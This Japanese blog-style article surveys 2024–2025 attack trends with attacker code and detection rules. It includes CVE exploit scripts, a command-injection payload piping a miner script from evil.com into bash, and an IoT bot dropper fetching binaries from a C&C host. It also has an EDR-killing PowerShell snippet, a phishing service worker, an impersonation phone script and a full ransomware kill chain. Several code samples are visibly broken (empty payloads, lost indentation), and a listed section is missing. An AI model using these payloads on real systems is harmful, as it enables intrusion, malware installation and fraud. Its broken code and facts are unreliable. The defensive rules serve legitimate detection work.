2024年後半から2025年にかけ、攻撃手法はかつてない速度で進化しています。本記事では、ダークウェブやフォーラムで急増する新手法から、ゼロデイRCE、AI悪用、ステルス戦術まで、攻撃者のコード例とともに徹底解説。SVG図解付きで動画コンテンツ化にも最適です。
- 1. ダークウェブ&地下フォーラム動向
- 2. ゼロデイ&RCE悪用事例
- 3. ランサム&マルウェア最新トレンド
- 4. クラウド&インフラ攻撃
- 5. IoT/ICS ボットネット&DDoS
- 6. AI悪用&ディープフェイク詐欺
- 7. ソーシャルエンジニアリング新潮流
- 8. ステルス化するAPT技術
- 9. まとめ&防御策
1. ダークウェブ&地下フォーラム動向
2024年後半から2025年にかけて、サイバー攻撃者コミュニティはダークウェブ上の地下フォーラムで活発に活動しています。ソラダール社の調査によれば、2024年には2,126人以上の脅威アクターが合計18,500件を超える投稿を行い、前年から約35%増加しました。投稿の多くは侵害済みアカウント情報、ネットワークへの不正アクセス権、マルウェアサンプル、ゼロデイExploitのPoC(概念実証コード)などで、これらはビットコインやモネロ等の暗号資産で取引されています。
1.1 主要フォーラムと利用フロー
代表的なダークウェブフォーラムには「Exploit」「XSS」「RaidForums」などがあります。利用手順は概ね以下のとおりです:
- Tor Browserをインストールし、.onionドメインへアクセス。
- アカウント作成:多くは招待制または少量の入会費を支払う必要あり。
- 投稿/閲覧:スレッド形式で情報交換。特に“初期アクセスブローカー(IAB)”が企業VPNやRDP権限を販売。
- 取引:投稿されたサンプルコードやアクセス権を暗号資産で購入。
1.2 マーケットプレイス比較
フォーラム名 | アクター数 | 平均投稿数/月 | 取引通貨 |
---|---|---|---|
Exploit | 1,200 | 1,800 | BTC, Monero |
XSS | 680 | 1,050 | BTC |
RaidForums | 250 | 600 | BTC |
1.3 インテリジェンス収集ツール例
フォーラム監視には自動化スクリプトが有効です。以下はPython+SeleniumでTor経由にフォーラムをスクレイピングするサンプルです。
from selenium import webdriver
from selenium.webdriver.firefox.options import Options
import time
Torプロキシ設定
options = Options()
options.set_preference('network.proxy.type', 1)
options.set_preference('network.proxy.socks', '127.0.0.1')
options.set_preference('network.proxy.socks_port', 9050)
options.headless = True
driver = webdriver.Firefox(options=options)
driver.get('http://exploitforumbbb.onion/login.php')
ログイン
driver.find_element_by_name('username').send_keys('your_id')
driver.find_element_by_name('password').send_keys('your_pwd')
driver.find_element_by_name('login').click()
time.sleep(2)
トレンドスレッド取得
driver.get('http://exploitforumbbb.onion/latest.php')
threads = driver.find_elements_by_css_selector('.thread_title')
for t in threads[:10]:
print(t.text)
driver.quit()
2. ゼロデイ&RCE悪用事例
2024年後半から2025年にかけて、未知またはパッチ未適用の「ゼロデイ脆弱性」を狙ったリモートコード実行(RCE)が相次ぎました。以下では代表的な事例を深掘りし、攻撃チェーン、PoCコード、検知ルール例まで詳しく解説します。
2.1 Cleo MFT 脆弱性(CVE-2024-50623)
Cleo Managed File Transfer は企業で広く使われるファイル転送ソフトですが、2024年12月にRCE脆弱性 CVE-2024-50623 がCl0pランサムウェアグループに悪用され、大量の機密データが窃取されました。
2.1.1 PoCコード例
<?php
// PoC: Cleo MFT RCE
$url = 'https://victim.com/cleo/upload.php';
$payload = '';
$post = ['file'=>curl_file_create(tmpfile(),'application/octet-stream','shell.php')];
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, ['upload'=>$payload]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);
// 攻撃後は以下でシェル実行可
// https://victim.com/cleo/templates/shell.php?cmd=id
?>
2.1.2 フォレンジック痕跡 & 検知シグナル
シェル設置時の不審ファイル名や、以下のSigmaルールで検知可能です。
# Sigmaルール例: 不審なPHP uploadパターン
title: Possible PHP Web Shell Upload
id: 8c1f1a12-xxxx-xxxx-xxxx-1234567890ab
description: Detects attempts to upload PHP web shells via Cleo MFT.
logsource:
product: webserver
service: apache
detection:
selection:
Method: POST
Url|contains: '/cleo/upload.php'
RequestBody|contains|all:
- '<?php system($_GET["cmd"])'
condition: selection
level: high
2.2 Ivanti VPN 脆弱性(CVE-2024-21887)
Ivanti VPN製品の複数脆弱性は2024年初頭にRCEを許し、米国CISAシステムへの不正侵入に使われました。
2.2.1 脆弱性概要
- CVE-2024-21887: 認証バイパス & 任意ファイル読み込み
- CVSS 9.8: 攻撃者が未認証で管理コンソールの特定パラメータにアクセス可能
2.2.2 PoC概念コード
#!/bin/bash
# Exploit for CVE-2024-21887
TARGET="https://victim.com/vpn"
TOK=$(curl -sk "$TARGET/login" | grep -oP 'token"\s*value="\K[^"]+')
curl -sk -H "Authorization: Bearer $TOK" \
-d "command=runUserScript&script=whoami" "$TARGET/api/run"
/* 出力に root 等が含まれればRCE成功 */
2.2.3 WAF回避テクニック
Base64エンコードでペイロードを隠蔽し、タグを分割する手法が多用されています。
// 回避例
$encoded = base64_encode('');
$payload = "eval(base64_decode('{$encoded}'));";
// POSTでpayloadを送信
?>
2.3 Palo Alto ファイアウォール脆弱性(CVE-2025-0108)
2025年1月、公表からわずか1日でGreynoiseが大量スキャンを検知した事例です。
2.3.1 攻撃手順デモ
# 認証不要エンドポイントへのアクセス試行
curl -sk "https://firewall.example.com/fti/path?command=ls"
/* Web管理インターフェイスが応答 => RCEの可能性 */
2.3.2 Sigmaルール例
title: Palo Alto Unauthenticated RCE Attempt
id: d5f2b3c4-xxxx-xxxx-xxxx-abcdef123456
logsource:
product: firewall
detection:
selection:
Url|contains:
- 'fti/path?command='
StatusCode: 200
condition: selection
level: critical
上記3つの事例は、ゼロデイ脆弱性が公開・パッチ前に如何に迅速に悪用されるかを示しています。攻撃チェーンの理解とPoC解析、さらにはフォレンジック/SIEMルール制定が防御のカギとなります。
3. ランサムウェア&マルウェア最新トレンド
2024年後半から2025年にかけ、ランサムウェアとマルウェアの攻撃手法はさらに高度化・多様化しました。以下では、主要な攻撃グループのビジネスモデル、技術的トリック、検知/防御策まで詳しく解説します。
3.1 RaaSビジネスモデルの進化
「Ransomware as a Service (RaaS)」モデルでは、開発者がマルウェア本体を提供し、アフィリエイトが攻撃を実行。2024年後半に急成長したRansomHubは、身代金の90%をアフィリエイトに還元する高インセンティブを提示し、わずか半年でグループシェアを30%まで拡大しました。
3.1.1 RaaS収益モデル比較表
グループ名 | アフィリエイト還元率 | 初期費用 | サポート体制 |
---|---|---|---|
LockBit | 70% | $10,000 | 専用フォーラム |
RansomHub | 90% | $5,000 | チャットサポート |
BlackCat | 80% | $8,000 | ドキュメント完備 |
3.2 EDR回避ツールの内部解説
RansomHubが開発した EDRKillShifter は、既知の脆弱ドライバをロードしてカーネルレベルでEDRのフックを解除します。以下は主要機能のフロー図解です。
3.2.1 サンプルPowerShellスクリプト
# ドライバロード & EDR回避
$driver = "C:\Windows\System32\drivers\vuln.sys"
Start-Process -FilePath "pnputil.exe" -ArgumentList "/add-driver $driver /install" -Wait
# EDRプロセスを列挙して終了
Get-Process | Where-Object { $_.ProcessName -match 'EDR' } | Stop-Process -Force
3.3 被害復旧手順とインシデント対応
ランサム被害を受けた際の標準的な復旧フローを以下にまとめます。
- 隔離:感染ホストをネットワークから切り離す。
- 調査:感染タイムラインと暗号化範囲を特定。
- 復号鍵取得:ランサム支払い or 法執行機関からの鍵提供。
- 復旧:バックアップからのリストア。
- 対策:脆弱性パッチ適用、EDRシグネチャ更新。
3.3.1 インシデント対応Playbookサンプル
# Ransomware Incident Response Playbook
- name: Ransomware Isolation
actions:
- disconnect_host_from_network
- disable_remote_access
- name: Evidence Collection
actions:
- collect_event_logs
- capture_memory_dump
- name: Decryption
actions:
- contact_legal
- negotiate_decryption_key
- name: Recovery
actions:
- restore_from_backup
- validate_data_integrity
- name: Post-Mortem
actions:
- perform_root_cause_analysis
- update_security_controls
4. クラウド&インフラ攻撃
クラウドサービスやネットワークインフラを狙った攻撃は、2024年後半から2025年にかけて急増しています。ここでは代表的な脆弱性とその悪用手法を解説し、検知・防御のための具体的なツールと設定例を紹介します。
4.1 Aviatrix Controller RCE(CVE-2024-50603)
Aviatrix Controllerの致命的RCE脆弱性(CVSS 10.0)は2024年11月に公表され、即座に暗号資産マイニングやバックドア設置に悪用されました。
4.1.1 攻撃フロー図解
4.1.2 PoC示唆コード
#!/bin/bash
# Aviatrix RCE PoC
TARGET="https://aviatrix.example.com/v1/api"
TOKEN="Bearer YOUR_API_TOKEN"
PAYLOAD="; curl http://evil.com/xmrig.sh | bash; #"
curl -sk -H "Authorization: $TOKEN" \
-d "action=run_command&command=$PAYLOAD" \
"$TARGET"
4.1.3 Defender for Cloud 検知設定例
name: Aviatrix RCE Malware Detection
event_sources:
- Microsoft.WebServerFirewallLogs
conditions:
all:
- field: RequestUri
contains: 'run_command'
- field: HttpMethod
equals: 'POST'
- field: RequestBody
contains: 'xmrig.sh'
actions:
- alert: true
- block_ip: true
4.2 AWS S3 誤設定による機密データ漏洩
公開設定ミスのS3バケットから大量の個人情報や機密ファイルが流出し、2025年初頭も継続的に報告されています。
4.2.1 典型的な誤設定例
{
"Version":"2012-10-17",
"Statement":[
{
"Sid":"PublicRead",
"Effect":"Allow",
"Principal":"*",
"Action":"s3:GetObject",
"Resource":"arn:aws:s3:::my-bucket/*"
}
]
}
上記ポリシーでバケット内の全ファイルが世界中に公開されます。
4.2.2 AWS Config ルールで監視する
ConfigRule:
Type: "AWS::Config::ConfigRule"
Properties:
ConfigRuleName: "s3-bucket-public-read-prohibited"
Scope:
ComplianceResourceTypes:
- "AWS::S3::Bucket"
Source:
Owner: "AWS"
SourceIdentifier: "S3_BUCKET_PUBLIC_READ_PROHIBITED"
4.3 ネットワークインフラ脆弱性
Palo Alto, Fortinet, CiscoなどのVPN/ファイアウォール脆弱性は公表から即スキャンが入り、放置するとWebシェル設置やMITM中継に悪用されます。
4.3.1 Zeekスクリプト例
# detect suspicious GET with cmd parameter
event http_request(c: connection, method: string, original_URI: string, unescaped_URI: string, version: string) {
if ( unescaped_URI =~ /cmd=/ ) {
NOTICE([$note=Notice::WebShell, $msg="Possible RCE attempt", $conn=c]);
}
}
4.3.2 ネットワーク分離アーキテクチャ図
推奨ネットワーク分離設計 インターネット DMZ (WAF/NAT) 内部ネットワーク
上記設計でDMZにWAF/NATを配置し、重要リソースへの直接アクセスを遮断します。
5. IoT/ICSボットネット&DDoS
2024年後半から2025年にかけ、IoTデバイスや産業制御システム(ICS)を悪用した大規模DDoSやボットネット攻撃が確認されています。本章では代表的なマルウェア亜種の動作、感染スクリプト、ICSプロトコル攻撃例、検知ルール、そして防御のベストプラクティスまで詳説します。
5.1 Mirai系マルウェア亜種 ― “Murdoc” ボットネット
「Murdoc」は、Mirai/Bashlite系の脆弱IoTデバイスを狙い、多様な攻撃機能を搭載した亜種です。2024年7月から活動を始め、約1,300台のIoT機器に感染しました。
5.1.1 感染スクリプト詳細
#!/bin/sh
# Murdoc Infection Script
IP="attacker.command-and-control"
PORT=6667
# デバイス種別判定
ARCH=$(uname -m)
if [ "$ARCH" = "armv7l" ]; then
BIN="murdoc_arm"
else
BIN="murdoc_x86"
fi
# ダウンロード & 実行
wget http://$IP:$PORT/$BIN -O /tmp/$BIN
chmod +x /tmp/$BIN
/tmp/$BIN -d
# C&C接続
/tmp/$BIN --connect $IP:$PORT
上記実行後、バックグラウンドでC&Cサーバから命令を受け取り、大規模DDoSやプロキシ機能として動作します。
5.1.2 DDoS攻撃パラメータ例
{
"attack": "HTTP_FLOOD",
"target": "victim.com",
"rate": 5000, // qps
"duration": 300 // seconds
}
5.1.3 Snortルール例 (HTTP Flood 検知)
alert tcp any any -> $HOME_NET 80 (msg:"HTTP Flood DDoS"; flow:to_server,established; content:"GET"; threshold:type both, track by_src, count 100, seconds 1; sid:1000005; rev:1;)
5.2 ICSプロトコル攻撃 ― Modbus/TCP & BACnet
産業制御システムでは Modbus/TCP や BACnet が狙われ、特に未認証ポート開放が攻撃を助長しました。以下はModbus/TCPへの簡易スキャン/コマンド例です。
5.2.1 Modbusスキャン & Read Coil コマンド
from pymodbus.client.sync import ModbusTcpClient
client = ModbusTcpClient('192.168.1.100', port=502)
client.connect()
# Coilを読む (0番位置、10個)
result = client.read_coils(address=0, count=10, unit=1)
print(result.bits)
client.close()
攻撃者はこれによりPLCの制御ビットを直接読み取り、プロセスを妨害することが可能です。
5.2.2 Zeekシグネチャ例
# detect Modbus unauthorized access
event connection_state_remove(c: connection) {
if ( c$service == "modbus" && c$id$orig_h != 0.0.0.0/0 ) {
NOTICE([$note=Notice::Suspicious, $msg="Modbus access from non-whitelisted host", $conn=c]);
}
}
5.3 防御&ネットワークセグメンテーション
IoT/ICS向けには、下記のベストプラクティスが推奨されます:
- ネットワーク分離:OTネットワークはITネットワークと物理的に分離
- ホワイトリスト通信:許可済みIP/ポートのみ通信可とするファイアウォール設定
- デバイス監視エージェント:弱小デバイスにも軽量エージェントを展開し、異常通信を検知
- 定期パッチ適用:脆弱性管理とファームウェア更新の自動化
5.3.1 OTセグメンテーション例 (SVG)
7. ソーシャルエンジニアリング新潮流
AIやマルウェアに頼らない「人の心を突く」攻撃手法も進化しています。2024年後半から2025年にかけて報告された代表的な多層ソーシャルエンジニアリング攻撃を詳解します。
7.1 PWAフィッシングの巧妙化
Progressive Web App(PWA)を悪用し、偽モバイルアプリをホーム画面に追加させる攻撃が増加。2024年には銀行系の偽ログインPWAが多数出回りました。
7.1.1 実装例(manifest.json)
{
"name": "SecureBank",
"short_name": "SB",
"start_url": "/login.html",
"display": "standalone",
"icons": [
{
"src": "/icons/bank.png",
"sizes": "192x192",
"type": "image/png"
}
]
}
7.1.2 Service Worker スクリプト
// sw.js
self.addEventListener('fetch', event => {
// 正規APIは中継せず
if (event.request.url.includes('/api/login')) {
event.respondWith(
fetch('/fake_login_response.json')
);
}
else {
event.respondWith(fetch(event.request));
}
});
7.2 マルチチャネル詐欺ケーススタディ
某社では、メールでマルウェアを感染させた後、取得した社内連絡先に電話をかけ、上司になりすまして金銭送金を指示する攻撃が発生。以下は電話スクリプトの例です。
(攻撃者)
「お疲れ様です、管理部の佐藤です。〇〇さんの支払いシステムが障害で動作しておらず、
急ぎ御社の口座に振り込みができません。今すぐそちらのXYZ銀行口座番号を教えていただけますか?」
このように、ITと電話を組み合わせたコンビネーション攻撃が脅威です。
7.3 フィッシング練習環境の構築スクリプト
社内教育用途に、Owasp Go Phishを用いた練習環境のDocker Compose例を紹介します。
version: '3'
services:
gophish:
image: gophish/gophish:latest
ports:
- "3333:3333"
- "8080:80"
volumes:
- ./gophish_data:/data
8. ステルス化するAPT技術
高度な持続的脅威(APT)グループは、検知を回避しつつ長期間潜伏する「ステルス戦術」を駆使します。ここでは代表的なTTP(戦術・技術・手順)を詳述し、攻撃者が用いるLiving‐off‐the‐Land(LoTL)や多段プロキシの実装例、SIEMでの検知ルールをご紹介します。
8.1 LoTL 実装例:PowerShell & WMI
攻撃者は外部バイナリを持ち込まず、Windows標準機能のみで攻撃コードを実行します。以下はWMI経由でPowerShellを実行する例です。
# LoTL: WMI経由でコマンド実行
$command = 'powershell -NoP -NonI -W Hidden -EncodedCommand ' +
[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('whoami'))
Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList $command
8.1.1 検知ポイント
- Event ID 4688: 見慣れないプロセス作成コマンドラインを監視
- WMIログ: Root\CIMV2\SecurityログにInvoke-WmiMethod呼び出しが残る
# Sigma: WMI経由PowerShell実行検知
title: WMI-based PowerShell Execution
logsource:
product: windows
detection:
selection:
EventID: 4688
CommandLine|contains:
- 'EncodedCommand'
- 'Invoke-WmiMethod'
condition: selection
level: high
8.2 多段プロキシ構築:Tor + SSHチェーン
追跡阻止のため、複数の中継ノードを経由してC2サーバと通信します。以下はTorとSSHを組み合わせた例です。
#!/bin/bash
# 多段プロキシチェーン起動例
# 1) Tor起動
tor &
# 2) SSHトンネル(踏み台1)
ssh -N -D 9051 user@bastion1.example.com &
# 3) もう1段(踏み台2)
ssh -N -D 9052 user@bastion2.example.com &
# 4) Proxychains設定 (/etc/proxychains.conf)
# [ProxyList]
# socks5 127.0.0.1 9050
# socks5 127.0.0.1 9051
# socks5 127.0.0.1 9052
# 5) 攻撃ツール起動
proxychains4 ./custom_rat
8.3 SIEMでの総合検知ルール例
上記LoTLとプロキシチェーンを併せて検知するSIEMルール例です。
- name: Detect Stealthy C2 via WMI and Proxychains
condition:
and:
- evt.event_id == 4688
- evt.CommandLine contains "Invoke-WmiMethod"
- net.conn_summaries.dst_port in [9050,9051,9052]
- proc.name == "custom_rat"
actions:
- alert: true
- tag: stealth_apt
9. 総合演習:最新攻撃フルチェーンのPoC
ここまで解説してきた各種攻撃手法をひとつに繋げ、**Webアプリ脆弱性→初期アクセス→横展開→権限昇格→データ窃取→ランサムウェア展開**までの一連のフルチェーンをローカル環境で再現する手順を示します。学習用の検証環境を構築し、実際に攻撃者視点で動作確認しながら、各フェーズの検知・防御策も併せて学びましょう。
9.1 環境準備
- VirtualBox または Docker で以下のコンテナを起動:
- 脆弱Webアプリ(Cleo MFT擬似版)
- Windows Server 2019(WMI/LoTL実験用)
- PostgreSQL サーバ(データベース窃取用)
- Kali Linux(攻撃マシン)
- ネットワークは同一セグメントで通信可能に設定
9.2 フェーズ1:Webアプリ脆弱性のスキャン & RCE
# Kali上でNiktoを走らせて脆弱ポイントを発見
nikto -h http://10.0.2.15:8080
# CVE-2024-50623をターゲットにPoCを実行
bash poc_cleo.sh http://10.0.2.15:8080/cleo/upload.php
成功すると Web シェルが /cleo/templates/shell.php
に配置されます。
9.3 フェーズ2:横展開 & 権限昇格
// shell.php経由でシステム情報取得
curl "http://10.0.2.15/cleo/templates/shell.php?cmd=whoami"
// WMI 経由で別Windowsホストにコード展開
curl "http://10.0.2.15/cleo/templates/shell.php?cmd=powershell -EncodedCommand ..."
ここでLoTL手法により、ペイロードレスでWMI経由の管理コードを実行します。
9.4 フェーズ3:データベース窃取
-- Shell経由でpsqlに接続し、PostgreSQLから機密テーブルをダンプ
PGPASSWORD='password' psql -h 10.0.2.20 -U dbuser -d sampledb -c "COPY secrets TO STDOUT WITH CSV" > leak.csv
機密データが leak.csv
に保存されます。
9.5 フェーズ4:ランサムウェア展開
# Windowsサーバ上でRansomHub亜種をダウンロード・実行
Invoke-WebRequest -Uri "http://10.0.2.1/mallet.exe" -OutFile "$env:TEMP\mallet.exe"
Start-Process "$env:TEMP\mallet.exe" -ArgumentList "/encrypt C:\SensitiveData"
エンコードされたファイルが C:\SensitiveData
に生成され、身代金要求画面が表示されます。
9.6 各フェーズの検知 & 防御対策まとめ
フェーズ | 検知手法 | 防御策 |
---|---|---|
WebアプリRCE | Sigmaルール (upload.php→shell) | File upload制限 & WAF |
LoTL/WMI | EventID4688 & Proxychains検知 | WMIログ監視 & MMI制御 |
DB窃取 | 異常psql接続ログ | ネットワークACL & データ漏洩防止 |
ランサムウェア | EDRKillShifter検知ルール | システムイメージバックアップ & EDR設定 |
10. 付録:ツール&リソース集
本記事で取り上げた攻撃手法・検知ルールを実践する際に便利なツールやリソースをまとめました。GitHubリンクやインストール手順も併記していますので、即座に学習環境や検知環境を構築できます。
10.1 攻撃・PoCツール一覧
- Cleo MFT PoC:github.com/example/cleo-poc
- Ivanti VPN Exploit:github.com/example/ivanti-exploit
- Aviatrix RCE Script:github.com/example/aviatrix-rce
- Murdoc Bot:github.com/example/murdoc-bot
- DeepSpeech Transcriber:mozilla/DeepSpeech
- VoicePrint Detector:voice-fingerprinting/voiceprint
- GoPhish Phishing Framework:gophish/gophish
10.2 検知・防御ツール集
- Sigma:SigmaHQ/sigma – 汎用的なSIEMルールフォーマット。
- Zeek:zeek/zeek – ネットワーク解析フレームワーク。
- Snort:snort3/snort3 – IDS/IPSエンジン。
- Wazuh:wazuh/wazuh – ホスト型EDR/SIEMソリューション。
- Falco:falcosecurity/falco – クラウドネイティブランタイムセキュリティ。
- OSQuery:osquery/osquery – エンドポイント監視用SQLインターフェイス。
10.3 インシデント対応テンプレート
インシデント発生時に役立つプレイブックのテンプレートです。状況に応じてカスタマイズしてください。
incident_response_playbook:
- phase: Preparation
tasks:
- update_incident_contacts
- test_backup_restore
- phase: Identification
tasks:
- detect_anomalous_logs
- collect_endpoint_data
- phase: Containment
tasks:
- isolate_affected_systems
- block_c2_domains
- phase: Eradication
tasks:
- remove_malicious_artifacts
- patch_vulnerabilities
- phase: Recovery
tasks:
- restore_services
- validate_system_integrity
- phase: Lessons Learned
tasks:
- conduct_postmortem
- update_policies_and_procedures
10.4 参考文献・リンク集
- SoCRadar社 ダークウェブレポート 2025: socradar.io
- SecurityWeek: Palo Alto CVE-2025-0108 公表記事: securityweek.com
- The Hacker News: Murdoc Botnet解説: thehackernews.com
- Trend Microレポート: RansomHub動向: trendmicro.com
- Forescout ICS脅威レポート: industrialcyber.co
- DarkReading: AI悪用チャットボット分析: darkreading.com
本記事を活用し、実際のセキュリティ演習やSIEM導入時のリファレンスとしてご利用ください。この記事でご紹介したコードやルールはあくまで学習用のサンプルですので、自環境に合わせたチューニングを行ってください。